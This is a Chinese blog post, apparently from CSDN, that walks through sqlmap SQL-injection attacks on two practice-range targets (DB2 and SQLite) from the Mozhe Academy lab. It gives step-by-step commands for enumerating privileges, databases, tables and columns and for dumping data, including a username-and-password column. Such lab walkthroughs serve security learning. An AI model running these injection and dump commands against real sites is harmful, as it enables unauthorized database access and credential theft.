sqlmap(四)案例

已于 2024-04-06 12:25:02 修改
阅读量779 收藏 11
点赞数 12
分类专栏: SQL 文章标签: android sql
于 2024-04-06 12:23:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ys1215/article/details/137424433
版权

一、注入DB2

http://124.70.71.251:49431/new_list.php?id=1

这是墨者学院里的靶机,地址:icon-default.png?t=N7T8https://www.mozhe.cn/

1.1 测试数据库类型

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1"

1.2 测试用户权限类型

查询选项

--is-dba                 查看当前用户是否为管理员

--current-usre       查看当前用户的用户名

--privileges           查看当前用户的权限

python sqlmap.py -u  "http://124.70.71.251:49431/new_list.php?id=1" --is-dba

查看当前用户的用户名

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --current-usre

查看当前用户的权限

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --privileges

1.3 查看库名

--dbs:获取系统中的所有库的名字

--current-db:获取当前库的名字

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --dbs
python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --current-db

1.4 查看表名

-D "库名" --tables

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" -D "DB2INST1" --tables

1.5 查看字段名

-D "库名" -T "表名" --columns

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" -D "DB@INST1" -T "NOTICE" --columns

1.6 查数据

-D "库名" -T "表名" --dump                          查表中的全部数据

-D "库名" -T "表名" --dump -C "字段"          查表中指定字段中的数据

python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" -D "DB2INST1" -T "NOTICE" -C "CONTENT" --dump

二、注入sqlite

测试地址:http://124.70.71.251:44648/new_list.php?id=1

2.1 测试数据库类型

清除缓存:--purge

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" --purge

2.2 测试用户权限类型

查询选项

--is-dba                查看当前用户是否为管理员

--current-user       查看当前用户的用户名【sqlite不支持】

--privileges           查看当前用户的权限

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" --is-dba

2.3 查看库名 

--dbs:获取系统中的所有库的名字【sqlite不支持】

--current-db:获取当前库的名字【sqlite不支持】

2.4 查看表名

-D "库名" --tables 【sqlite不支持】

--tables【sqlite只能这样写】

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" --tables

2.5 查看字段名

-T "表名" --columns

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" -T "WSTMart_reg" --columns

2.6 查数据

-D "库名" -T "表名" --dump                     查表中的全部数据

-D "库名" -T "表名" --dump -C "字段"     查看表中的指定字段中的数据

python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" -T "WSTMart_reg" --dump -C "name,password"
ys52IT
关注
  • 12
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
SQLmap使用手册1
08-03
SQLmap 所支持的数据库系统基本涵盖了我们常用的一些关系类的数据库诸如:MySQL、Oracle、PostgreSQL、MSSQL、Microsoft、IB
SQLMAP教程,零基础入门到精通,一篇就够了!
最新发布
程序员阿飘 的博客
02-19 865
这些选项可以用来创建用户自定义函数`--udf-inject 注入用户自定义函数`` ` `--shared-lib=SHLIB 共享库的本地路径`
Sqlmap参数详解
gao646467783的博客
11-21 805
sqlmap全参数详解 sqlmap是在sql注入中非常常用的一款工具,由于其开源性,适合从个人到企业,从学习到实战,各领域各阶段的应用,我们还可以将它改造成我们自己独有的渗透利器。这款工具中,大大小小191个参数,在这篇文章中,我将一一介绍,其实很多参数我也没有使用过,所以有一些...
SQLMap工具-1】SQLMap简介及简单应用实例
热门推荐
m0_64378913的博客
04-27 4万+
1 SQLMap简介 SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。 注意:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。 SQLMap
渗透测试-SQL注入之sqlmap的使用方法及实战案例
lza20001103的博客
07-19 3800
渗透测试-SQL注入之sqlmap的使用方法及实战案例
5-15sqlmap工具使用入门及案例演示
山兔的博客
06-03 538
sqlmap简介  sqlmap经典6步法及常用技巧  使用sqlmap进行盲注的自动化测试我们之前讲sql案例的时候,我们都是用手工的方法去测试,但是实际上,用手工的方法比较麻烦,而在实际的工作当中,为了提高效率,我们往往会使用相关的自动化工具去做测试,但是前提条件是,我们一定要把这些漏洞的原理搞清楚,所以,我们之前讲的那么多原理和手动测试的一些东西,what’s sqlmap? Automatic SQL injection and database takeover tool自动化测试sql
SQLMAP基础及用法
m0_73720136的博客
04-17 406
2.基于时间的盲注:不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。SQLMAP是一个开源的自动化SQL注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞。3.基于报错的注入:页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。2.判断可以用哪种SQL注入技术来注入识别出所有存在的注入类型。4.基于联合查询的注入:可以使用UNION的情况下的注入。1.基于布尔的盲注:根据返回页面判断条件真假的注入。3.识别出所有存在的注入类型。
SQLMAP工具 详细使用方法
HAKUNAMATATATTA的博客
11-15 3369
SQLMAP 是一个开源的渗透测试工具,可以用来自动化的检测,利用 SQL 注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
sql注入原理及各姿势sqlmap使用
m0_63641882的博客
12-04 1377
ps:及后端服务器在收到参数未对参数进行过滤直接带入数据库当中进行查询,这样就导致了参数拼接构造的sql语句进行执行列子:当我们在前端进行页面登录的时候后端代码 输入用户admin和万能密码:2' or '1时后端代码 因为逻辑运算符有优先级之分 or
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 4711
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
sqlmap的使用与实例
Hardworking666的博客
05-13 1793
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一、sqlmap简介二、使用步骤1.注入2.用户权限 一、sqlmap简介 Sqlmap是开源的自动化SQL注入工具,由Python写成。 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在
Sqlmap的使用实例
lsyhaoshuai的博客
05-14 522
Sqlmap的使用实例 Sqlmap是渗透中一种常见的注入工具,之前的sqlmap只支持python2.6和python2.7,傻傻的我看博客的时候竟然不知道看日期,现在都2020年了,如今sqlmap也支持python3.0了。 俗话说工欲善其事必先利其器,欲练习sqlmap的注入学习必须先把工具准备齐全,这一版首先分享一下环境的布置,以及自己踩过的坑。准备工具如下: 1.python3.7 可以从官网下载 https://www.python.org/downloads/ python的安装步骤可以自行
sqlmap工具使用入门及案例介绍
北冥有鱼
04-09 945
前面讲到过sqlmap的安装,今天来讲一下例子 sqlmap的用法很多很多,而且功能都很强大,可以称为渗透的神器 1.sqlmap经典用法 案例:还是在pikachu靶场,我们进入盲注 随意提交一个字符串 发现他是一个get请求,他的输入点就在name的传参里面,我们把这一段url复制一下 打开我们的sqlmap 这段语句可以让软件帮你自动查询这个url中是否有sql注入漏洞 这样就可...
sqlmap注入实例
~初出茅庐~ 的博客
10-16 1086
第一步: 安装Python, 安装完成将sqlmap文件夹解压放到C:\Python27\下面。 附件(Python2.7.1安装包+sqlmap包): https://download.csdn.net/download/qq_23306363/10724195 第二步: 1)win+R,输入cmd,输入 cd c:\ 进入c盘 2)确定网址:如"http://XXX" 3)输入...
sqlmap注入Access实例
0ffs3t
02-14 6432
FROM:暗组   最近学习SQL注入攻击,首先从Access+ASP开始,以前没有发现Linux下有什么针对Access的注入工具,后来才知道原来 SQLMap可以 什么是SQL注入攻击? SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员 也越来越多。但是由于程序员的水平及经验也参差不齐,相
sqlmap一个简单的例子
安全汪
11-11 470
微博杂志社区注册登录 听潮门户 - ListenTide 搜索   门户论坛分站应用公益关于注册历程帮助 常规渗透 CMS渗透 内网渗透 Linux渗透 WAF突破 权限提升 无线安全 移动安全 社会工程 安全运维
sqlmap基本用法及实例
whoim_i的博客
10-21 1083
这里`在这里插入代码片`写自定义目录标题一、 sqlmap介绍二 、sqlmap基本用法三、实例使用sqlmap实现自动化注入攻击,对操作系统命令进行操作 一、 sqlmap介绍 sqlmap 是一个自动化的 SQL 注入工具,其主要功能是扫描,发现并利用给定的 URL 进行SQL注入。 Sqlmap 采用了以下 5 种独特的 SQL 注入技术 1、基于布尔类型的盲注,即可以根据返回页面判断条件真...
iBATIS:一个完整的sqlmap示例
weixin_34199405的博客
01-15 424
别忘记把对应每张表的sqlmap xml路径加入总sqlmap xml中 如下: <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE sqlMap PUBLIC "-//ibatis.apache.org//DTD SQL Map 2.0//EN" "http://ibatis...
sqlmap安装及实例应用
Tututuo
04-22 2770
##sqlmap要在python环境下使用。且是python2.7版本(亲测3x版本sqlmap安装不成功)一.安装python2.71.下载     点击打开官网2.安装        修改安装目录之后,点击add python.exe to path. 可以避免后面再配置环境变量。    等待安装完成。3.测试安装完成之后,重启电脑打开命令提示符,输入 python,看python是否安装成功...
sqlmap测试案例
08-29
可以提供一些常见的 SQLMap 测试案例,帮助你了解其功能和用法。以下是一些示例: 1. 基本测试: ``` python sqlmap.py -u "http://example.com/page.php?id=1" ``` 2. POST 请求测试: ``` python sqlmap.py...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ys52IT

你的鼓励将是我创作的最大动力你

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值